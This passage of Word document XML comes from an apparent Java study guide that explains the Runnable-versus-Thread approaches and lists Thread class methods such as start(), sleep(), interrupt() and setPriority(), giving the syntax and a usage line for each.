    <w:p w14:paraId="5ABE89B8" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extending Thread:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You directly extend the Thread class and override its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB639C6" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implementing Runnable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You implement the Runnable interface and pass the instance to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD34A48" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both approaches achieve the same result, but using the Runnable interface is preferred in most cases because it allows greater flexibility and doesn't limit you to extending the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680171B" w14:textId="0103E4E7" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00096260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="39D37A34">
          <v:rect id="_x0000_i1856" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A05216" w14:textId="77777777" w:rsidR="001418BD" w:rsidRPr="00CE4B95" w:rsidRDefault="001418BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="_Toc196307767"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are all methods present in Thread class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w14:paraId="325A6678" w14:textId="674CF39D" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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e Thread class in Java provides several methods for managing and controlling thread execution. Below is a list of important methods present in the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119D26C" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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1. start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA685A" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method starts the execution of the thread. It calls the run() method of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32722CD9" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public synchronized void start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F46BD" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB9AC8E" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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2. run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DB302" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The method that contains the code to be executed by the thread. It is called when start() is invoked on a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19690B1A" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDBA0D6" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You override this method in a custom thread to specify the behavior of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB61B05" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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3. sleep(long millis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E374A3B" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the currently executing thread to sleep (suspend execution) for the specified number of milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27BB35" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public static void sleep(long millis) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145D12C" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread.sleep(1000); // Sleep for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76548F" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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4. yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96C80C" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the currently executing thread to pause and allow other threads of the same priority to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F851C86" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public static void yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A401F2" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread.yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB5C69" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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5. interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644E42B" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interrupts the thread. It sets the thread’s interrupt flag to true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1F131" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBEC366" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205AF327" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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6. isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EE380" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the thread is still alive (i.e., has been started and has not yet died), and false otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA9885" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public boolean isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619D2D4" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean status = thread.isAlive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B9BE71" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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7. getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBF46E" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the unique identifier for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CF1B5" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public long getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50818D1C" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> long threadId = thread.getId();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F5BA4" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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8. getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B6EB5" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the name of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812DE36" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>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lastRenderedPageBreak/>
        <w:t>Syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public String getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E389E6" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> String name = thread.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DEC96" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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9. setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9FA87" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sets the name of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CE430" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AC26E" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.setName("MyThread");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781CA42" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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10. setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393906B7" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sets the priority of the thread. The valid range is from Thread.MIN_PRIORITY (1) to Thread.MAX_PRIORITY (10). By default, a thread has a priority of Thread.NORM_PRIORITY (5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC371EC" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public void setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F64399" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread.setPriority(Thread.MAX_PRIORITY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C2EC1" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72"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11. getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA8ACA" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the priority of the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB37B5" w14:textId="77777777" w:rsidR="00143A72" w:rsidRPr="00414276" w:rsidRDefault="00143A72" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122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tax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
